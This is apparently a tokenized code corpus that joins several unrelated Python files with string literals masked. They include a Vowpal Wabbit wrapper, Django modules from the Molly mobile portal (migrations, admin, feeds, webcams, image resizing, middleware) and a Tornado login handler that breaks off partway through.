Namespace ( * args , ** kwargs ) <EOL> self . namespaces . append ( namespace ) <EOL> return self <EOL> def add_namespaces ( self , namespaces ) : <EOL> """<STR_LIT>""" <EOL> for namespace in namespaces : <EOL> self . 
add_namespace ( namespace ) <EOL> return self <EOL> def get_prediction ( self , features = None , tag = None , namespaces = None ) : <EOL> """<STR_LIT>""" <EOL> if features is not None : <EOL> namespace = Namespace ( features = features ) <EOL> self . add_namespace ( namespace ) <EOL> result = self . send_example ( tag = tag , namespaces = namespaces ) <EOL> return result <EOL> def save_model ( self , model_filename ) : <EOL> """<STR_LIT>""" <EOL> line = "<STR_LIT>" . format ( model_filename ) <EOL> self . vw_process . sendline ( line ) <EOL> def close ( self ) : <EOL> """<STR_LIT>""" <EOL> self . vw_process . close ( ) <EOL> def make_command_line ( predictions = '<STR_LIT>' , <EOL> quiet = True , <EOL> save_resume = True , <EOL> q_colon = None , <EOL> ** kwargs <EOL> ) : <EOL> """<STR_LIT>""" <EOL> args = [ '<STR_LIT>' ] <EOL> if q_colon : <EOL> kwargs [ '<STR_LIT>' ] = q_colon <EOL> kwargs [ '<STR_LIT>' ] = predictions <EOL> kwargs [ '<STR_LIT>' ] = quiet <EOL> kwargs [ '<STR_LIT>' ] = save_resume <EOL> for key , value in kwargs . items ( ) : <EOL> if len ( key ) == <NUM_LIT:1> : <EOL> option = '<STR_LIT>' . format ( key ) <EOL> else : <EOL> option = '<STR_LIT>' . format ( key ) <EOL> if value is True : <EOL> arg_list = [ option ] <EOL> elif isinstance ( value , basestring ) : <EOL> arg_list = [ '<STR_LIT>' . format ( option , value ) ] <EOL> elif hasattr ( value , '<STR_LIT>' ) : <EOL> arg_list = [ '<STR_LIT>' . format ( option , subvalue ) for subvalue in value ] <EOL> else : <EOL> arg_list = [ '<STR_LIT>' . format ( option , value ) ] <EOL> args . extend ( arg_list ) <EOL> command = '<STR_LIT:U+0020>' . join ( args ) <EOL> return command </s>
<s> from setuptools import setup , find_packages <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> packages = find_packages ( ) , <EOL> include_package_data = True , <EOL> description = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> keywords = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> url = '<STR_LIT>' , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> ) </s>
<s> """<STR_LIT>""" </s>
<s> from molly . conf . provider import Provider <EOL> class BaseFeedsProvider ( Provider ) : <EOL> pass <EOL> from rss import RSSFeedsProvider <EOL> from ical import ICalFeedsProvider <EOL> from talks_cam import TalksCamFeedsProvider </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . delete_column ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> db . delete_column ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> db . delete_column ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> db . delete_column ( '<STR_LIT>' , '<STR_LIT:title>' ) <EOL> db . create_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> db . create_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> db . create_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> db . delete_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> db . delete_unique ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> db . add_column ( '<STR_LIT>' , '<STR_LIT:title>' , self . gf ( '<STR_LIT>' ) ( default = '<STR_LIT>' , blank = True ) , keep_default = False ) <EOL> for eg in orm . EntityGroup . objects . all ( ) : <EOL> eg . title = name_in_category ( eg , '<STR_LIT:title>' ) <EOL> db . add_column ( '<STR_LIT>' , '<STR_LIT:title>' , self . gf ( '<STR_LIT>' ) ( default = '<STR_LIT>' , blank = True ) , keep_default = False ) <EOL> for e in orm . Entity . objects . all ( ) : <EOL> e . title = name_in_category ( eg , '<STR_LIT:title>' ) <EOL> db . add_column ( '<STR_LIT>' , '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = '<STR_LIT>' , blank = True ) , keep_default = False ) <EOL> db . add_column ( '<STR_LIT>' , '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = '<STR_LIT>' , blank = True , max_length = <NUM_LIT:2> ) , keep_default = False ) <EOL> db . add_column ( '<STR_LIT>' , '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = '<STR_LIT>' , blank = True ) , keep_default = False ) <EOL> for e in orm . Entity . objects . all ( ) : <EOL> e . 
article = name_in_category ( eg , '<STR_LIT>' ) . split ( ) [ <NUM_LIT:0> ] <EOL> e . verbose_name = name_in_category ( eg , '<STR_LIT>' ) <EOL> e . verbose_name_plural = name_in_category ( eg , '<STR_LIT>' ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:location>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:source>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : 
"<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:source>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : 
'<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:value>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : 
'<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> from django . contrib import admin <EOL> from models import * <EOL> class PodcastCategoryNameInline ( admin . TabularInline ) : <EOL> model = PodcastCategoryName <EOL> fk_name = "<STR_LIT>" <EOL> class PodcastCategoryAdmin ( admin . ModelAdmin ) : <EOL> list_display = ( '<STR_LIT>' , '<STR_LIT:name>' ) <EOL> inlines = [ <EOL> PodcastCategoryNameInline , <EOL> ] <EOL> class PodcastAdmin ( admin . ModelAdmin ) : <EOL> list_display = ( '<STR_LIT>' , '<STR_LIT:title>' ) <EOL> list_filter = ( '<STR_LIT>' , ) <EOL> class PodcastItemAdmin ( admin . ModelAdmin ) : <EOL> list_display = ( '<STR_LIT>' , '<STR_LIT:title>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> list_filter = ( '<STR_LIT>' , ) <EOL> admin . site . register ( Podcast , PodcastAdmin ) <EOL> admin . site . register ( PodcastCategory , PodcastCategoryAdmin ) <EOL> admin . site . register ( PodcastItem , PodcastItemAdmin ) <EOL> admin . site . register ( PodcastEnclosure ) </s>
<s> from molly . conf . provider import Provider <EOL> from datetime import datetime <EOL> import dateutil . parser <EOL> import feedparser <EOL> class RSSModuleServiceStatusProvider ( Provider ) : <EOL> def __init__ ( self , name , slug , url ) : <EOL> self . name , self . slug , self . url = name , slug , url <EOL> def parse_date ( self , s ) : <EOL> try : <EOL> return dateutil . parser . parse ( s ) <EOL> except ( TypeError , ValueError ) : <EOL> return None <EOL> def safe_parse ( self , f , s ) : <EOL> try : <EOL> return f ( s ) <EOL> except ( TypeError , ValueError ) : <EOL> return None <EOL> def get_status ( self ) : <EOL> services_feed = feedparser . parse ( self . url ) <EOL> try : <EOL> lastBuildDate = self . parse_date ( services_feed . entries [ <NUM_LIT:0> ] . get ( '<STR_LIT>' ) ) <EOL> except IndexError , e : <EOL> try : <EOL> lastBuildDate = self . parse_date ( services_feed . headers [ '<STR_LIT>' ] ) <EOL> except Exception , e : <EOL> lastBuildDate = None <EOL> services = [ ] <EOL> for service in services_feed . entries : <EOL> services . append ( { <EOL> '<STR_LIT:source>' : self . slug , <EOL> '<STR_LIT>' : self . name , <EOL> '<STR_LIT:name>' : service . title , <EOL> '<STR_LIT>' : { '<STR_LIT:true>' : True , '<STR_LIT:false>' : False } . get ( service . get ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : self . parse_date ( service . get ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : self . parse_date ( service . get ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : self . safe_parse ( int , service . get ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : self . safe_parse ( float , service . get ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : service . get ( '<STR_LIT>' ) , <EOL> } ) <EOL> services [ - <NUM_LIT:1> ] [ '<STR_LIT:status>' ] = { <NUM_LIT:0> : '<STR_LIT>' , <NUM_LIT:100> : '<STR_LIT>' , None : { True : '<STR_LIT>' , False : '<STR_LIT>' , } . get ( services [ - <NUM_LIT:1> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) } . 
get ( services [ - <NUM_LIT:1> ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> return { <EOL> '<STR_LIT>' : services , <EOL> '<STR_LIT>' : lastBuildDate , <EOL> } <EOL> def get_announcements ( self ) : <EOL> return [ ] </s>
<s> from datetime import timedelta <EOL> from xml . sax . saxutils import escape <EOL> from django . shortcuts import get_object_or_404 <EOL> from django . http import Http404 <EOL> from django . utils . translation import ugettext as _ <EOL> from molly . conf . urls import url <EOL> from molly . utils . breadcrumbs import * <EOL> from molly . utils . views import BaseView <EOL> from molly . favourites . views import FavouritableView <EOL> from molly . external_media import resize_external_image <EOL> from molly . apps . webcams . models import Webcam , WEBCAM_WIDTHS <EOL> import datetime <EOL> @ url ( r'<STR_LIT>' , '<STR_LIT:index>' ) <EOL> class IndexView ( BaseView ) : <EOL> def get_metadata ( self , request ) : <EOL> return { <EOL> '<STR_LIT:title>' : _ ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) , <EOL> } <EOL> @ BreadcrumbFactory <EOL> def breadcrumb ( self , request , context ) : <EOL> return Breadcrumb ( self . conf . local_name , None , _ ( '<STR_LIT>' ) , lazy_reverse ( '<STR_LIT:index>' ) ) <EOL> def handle_GET ( self , request , context ) : <EOL> webcams = Webcam . objects . all ( ) <EOL> context [ '<STR_LIT>' ] = webcams <EOL> return self . render ( request , context , '<STR_LIT>' , <EOL> expires = timedelta ( days = <NUM_LIT:7> ) ) <EOL> @ url ( r'<STR_LIT>' , '<STR_LIT>' ) <EOL> class WebcamDetailView ( FavouritableView ) : <EOL> def get_metadata ( self , request , slug ) : <EOL> webcam = get_object_or_404 ( Webcam , slug = slug ) <EOL> return { <EOL> '<STR_LIT:title>' : webcam . title , <EOL> '<STR_LIT>' : _ ( '<STR_LIT>' ) % { '<STR_LIT:description>' : escape ( webcam . description ) } <EOL> } <EOL> def initial_context ( self , request , slug ) : <EOL> context = super ( WebcamDetailView , self ) . initial_context ( request ) <EOL> context . 
update ( { '<STR_LIT>' : get_object_or_404 ( Webcam , slug = slug ) } ) <EOL> return context <EOL> @ BreadcrumbFactory <EOL> def breadcrumb ( self , request , context , slug ) : <EOL> return Breadcrumb ( self . conf . local_name , lazy_parent ( '<STR_LIT:index>' ) , <EOL> _ ( '<STR_LIT>' ) , lazy_reverse ( '<STR_LIT>' , args = [ slug ] ) ) <EOL> def handle_GET ( self , request , context , slug ) : <EOL> try : <EOL> eis = resize_external_image ( <EOL> context [ '<STR_LIT>' ] . url , <EOL> request . map_width , timeout = <NUM_LIT:5> ) <EOL> except : <EOL> eis = None <EOL> context [ '<STR_LIT>' ] = eis <EOL> return self . render ( request , context , '<STR_LIT>' ) </s>
<s> from __future__ import division <EOL> import os . path <EOL> import random <EOL> import urllib <EOL> from datetime import datetime <EOL> try : <EOL> from cStringIO import StringIO <EOL> except ImportError : <EOL> from StringIO import StringIO <EOL> from PIL import Image <EOL> from django . db import models <EOL> from django . conf import settings <EOL> from django . core . urlresolvers import reverse <EOL> class ExternalImage ( models . Model ) : <EOL> url = models . URLField ( ) <EOL> etag = models . TextField ( null = True ) <EOL> last_modified = models . TextField ( null = True ) <EOL> last_updated = models . DateTimeField ( ) <EOL> width = models . PositiveIntegerField ( null = True ) <EOL> height = models . PositiveIntegerField ( null = True ) <EOL> def save ( self , force_insert = False , force_update = False , * args , ** kwargs ) : <EOL> self . last_updated = datetime . utcnow ( ) <EOL> super ( ExternalImage , self ) . save ( force_insert = False , force_update = False , ** kwargs ) <EOL> def get_external_image_dir ( ) : <EOL> return getattr ( settings , '<STR_LIT>' , os . path . join ( settings . CACHE_DIR , '<STR_LIT>' ) ) <EOL> class ExternalImageSized ( models . Model ) : <EOL> external_image = models . ForeignKey ( ExternalImage ) <EOL> width = models . PositiveIntegerField ( ) <EOL> height = models . PositiveIntegerField ( ) <EOL> slug = models . SlugField ( ) <EOL> content_type = models . TextField ( ) <EOL> def get_filename ( self ) : <EOL> external_image_dir = get_external_image_dir ( ) <EOL> if not self . slug : <EOL> while not self . slug or ExternalImageSized . objects . filter ( slug = self . slug ) . count ( ) : <EOL> self . slug = "<STR_LIT>" % random . randint ( <NUM_LIT:0> , <NUM_LIT:16> ** <NUM_LIT:8> - <NUM_LIT:1> ) <EOL> if not os . path . exists ( external_image_dir ) : <EOL> os . makedirs ( external_image_dir ) <EOL> return os . path . join ( external_image_dir , self . 
slug ) <EOL> def get_absolute_url ( self ) : <EOL> return reverse ( '<STR_LIT>' , args = [ self . slug ] ) <EOL> def save ( self , force_insert = False , force_update = False , * args , ** kwargs ) : <EOL> if not self . id : <EOL> response = urllib . urlopen ( self . external_image . url ) <EOL> data = StringIO ( response . read ( ) ) <EOL> im = Image . open ( data ) <EOL> size = im . size <EOL> ratio = size [ <NUM_LIT:1> ] / size [ <NUM_LIT:0> ] <EOL> if self . width >= size [ <NUM_LIT:0> ] : <EOL> resized = im <EOL> else : <EOL> try : <EOL> resized = im . resize ( ( self . width , int ( round ( self . width * ratio ) ) ) , Image . ANTIALIAS ) <EOL> except IOError , e : <EOL> if e . message == "<STR_LIT>" : <EOL> resized = im <EOL> else : <EOL> raise <EOL> self . width , self . height = resized . size <EOL> try : <EOL> resized . save ( self . get_filename ( ) , format = '<STR_LIT>' ) <EOL> self . content_type = '<STR_LIT>' <EOL> except IOError , e : <EOL> try : <EOL> resized . convert ( '<STR_LIT>' ) . save ( self . get_filename ( ) , format = '<STR_LIT>' ) <EOL> self . content_type = '<STR_LIT>' <EOL> except IOError : <EOL> open ( self . get_filename ( ) , '<STR_LIT:wb>' ) . write ( data . getvalue ( ) ) <EOL> self . content_type = response . headers [ '<STR_LIT>' ] <EOL> self . external_image . width = size [ <NUM_LIT:0> ] <EOL> self . external_image . height = size [ <NUM_LIT:1> ] <EOL> super ( ExternalImageSized , self ) . save ( force_insert = False , force_update = False , ** kwargs ) <EOL> def delete ( self ) : <EOL> try : <EOL> os . unlink ( self . get_filename ( ) ) <EOL> except OSError : <EOL> pass <EOL> super ( ExternalImageSized , self ) . delete ( ) </s>
<s> from django . conf . urls . defaults import * <EOL> from . views import GeneratedMapView , GPXView , AboutView <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> ( r'<STR_LIT>' , AboutView , { } , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , GeneratedMapView , { } , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , GPXView , { } , '<STR_LIT>' ) , <EOL> ) </s>
<s> import sys <EOL> import logging <EOL> from collections import namedtuple <EOL> from django . http import Http404 <EOL> from django . conf import settings <EOL> from django . contrib . gis . geos import Point <EOL> from django . core . exceptions import ImproperlyConfigured , PermissionDenied <EOL> from django . middleware . locale import LocaleMiddleware <EOL> from django . utils import translation <EOL> from django . core . signals import got_request_exception <EOL> from molly . utils . views import handler500 <EOL> logger = logging . getLogger ( __name__ ) <EOL> Location = namedtuple ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> class LocationMiddleware ( object ) : <EOL> """<STR_LIT>""" <EOL> def process_request ( self , request ) : <EOL> latitude = None <EOL> longitude = None <EOL> accuracy = None <EOL> if '<STR_LIT>' in request . GET and '<STR_LIT>' in request . GET : <EOL> latitude = request . GET [ '<STR_LIT>' ] <EOL> longitude = request . GET [ '<STR_LIT>' ] <EOL> accuracy = request . GET . get ( '<STR_LIT>' ) <EOL> elif '<STR_LIT>' in request . META : <EOL> location_string = request . META [ '<STR_LIT>' ] <EOL> try : <EOL> temp_dict = dict ( [ token . split ( '<STR_LIT:=>' ) for token in location_string . split ( '<STR_LIT:U+002C>' ) ] ) <EOL> if '<STR_LIT>' in temp_dict and '<STR_LIT>' in temp_dict : <EOL> latitude = temp_dict [ '<STR_LIT>' ] <EOL> longitude = temp_dict [ '<STR_LIT>' ] <EOL> accuracy = temp_dict . get ( '<STR_LIT>' ) <EOL> except ValueError : <EOL> pass <EOL> elif '<STR_LIT>' in request . session : <EOL> longitude , latitude = request . session [ '<STR_LIT>' ] <EOL> accuracy = request . session . get ( '<STR_LIT>' ) <EOL> if latitude and longitude : <EOL> point = Point ( float ( longitude ) , float ( latitude ) , srid = <NUM_LIT> ) <EOL> if accuracy : <EOL> accuracy = float ( accuracy ) <EOL> else : <EOL> accuracy = None <EOL> request . 
user_location = Location ( point , accuracy ) <EOL> class ErrorHandlingMiddleware ( object ) : <EOL> def process_exception ( self , request , exception ) : <EOL> if isinstance ( exception , Http404 ) : <EOL> return <EOL> elif isinstance ( exception , PermissionDenied ) : <EOL> return <EOL> elif isinstance ( exception , ImproperlyConfigured ) : <EOL> logger . critical ( "<STR_LIT>" , exc_info = True ) <EOL> else : <EOL> logger . exception ( "<STR_LIT>" % ( type ( exception ) . __name__ , request . path ) ) <EOL> got_request_exception . send ( sender = self , request = request ) <EOL> return handler500 ( request , exc_info = sys . exc_info ( ) ) <EOL> class CookieLocaleMiddleware ( LocaleMiddleware ) : <EOL> def process_request ( self , request ) : <EOL> language_code = request . REQUEST . get ( '<STR_LIT>' ) <EOL> if language_code and language_code in dict ( settings . LANGUAGES ) : <EOL> translation . activate ( language_code ) <EOL> else : <EOL> if hasattr ( request , '<STR_LIT>' ) : <EOL> session = request . session <EOL> del request . session <EOL> super ( CookieLocaleMiddleware , self ) . process_request ( request ) <EOL> request . session = session <EOL> else : <EOL> super ( CookieLocaleMiddleware , self ) . process_request ( request ) <EOL> def process_response ( self , request , response ) : <EOL> language_code = request . REQUEST . get ( '<STR_LIT>' ) <EOL> if language_code and language_code in dict ( settings . LANGUAGES ) : <EOL> response . set_cookie ( settings . LANGUAGE_COOKIE_NAME , language_code ) <EOL> return super ( CookieLocaleMiddleware , self ) . process_response ( request , <EOL> response ) </s>
<s> '''<STR_LIT>''' <EOL> import os <EOL> import logging <EOL> from tornado . web import RequestHandler <EOL> from recaptcha . client import captcha <EOL> from libs . Form import Form <EOL> from libs . ConfigManager import ConfigManager <EOL> from libs . SecurityDecorators import authenticated <EOL> from handlers . BaseHandlers import BaseHandler <EOL> from models import User <EOL> class WelcomeHandler ( BaseHandler ) : <EOL> '''<STR_LIT>''' <EOL> def get ( self , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> self . render ( "<STR_LIT>" ) <EOL> class LoginHandler ( BaseHandler ) : <EOL> '''<STR_LIT>''' <EOL> def get ( self , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> self . render ( "<STR_LIT>" , errors = None ) <EOL> def post ( self , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> form = Form ( <EOL> username = "<STR_LIT>" , <EOL> password = "<STR_LIT>" , <EOL> ) <EOL> if not form . validate ( self . request . arguments ) : <EOL> self . render ( "<STR_LIT>" , errors = form . errors ) <EOL> else : <EOL> user = User . by_username ( self . get_argument ( '<STR_LIT:username>' ) ) <EOL> if user is not None and user . validate_password ( self . get_argument ( '<STR_LIT:password>' ) ) : <EOL> if user . locked : <EOL> self . render ( "<STR_LIT>" , <EOL> errors = [ "<STR_LIT>" ] <EOL> ) <EOL> else : <EOL> self . successful_login ( user ) <EOL> self . redirect ( '<STR_LIT>' ) <EOL> else : <EOL> self . failed_login ( ) <EOL> def successful_login ( self , user ) : <EOL> '''<STR_LIT>''' <EOL> logging . info ( "<STR_LIT>" % ( <EOL> user . username , self . request . remote_ip , <EOL> ) ) <EOL> self . start_session ( ) <EOL> self . session [ '<STR_LIT:username>' ] = str ( user . username ) <EOL> self . session [ '<STR_LIT>' ] = str ( self . request . remote_ip ) <EOL> if user . has_permission ( '<STR_LIT>' ) : <EOL> self . session . data [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> else : <EOL> self . session . data [ '<STR_LIT>' ] = "<STR_LIT:user>" <EOL> self . 
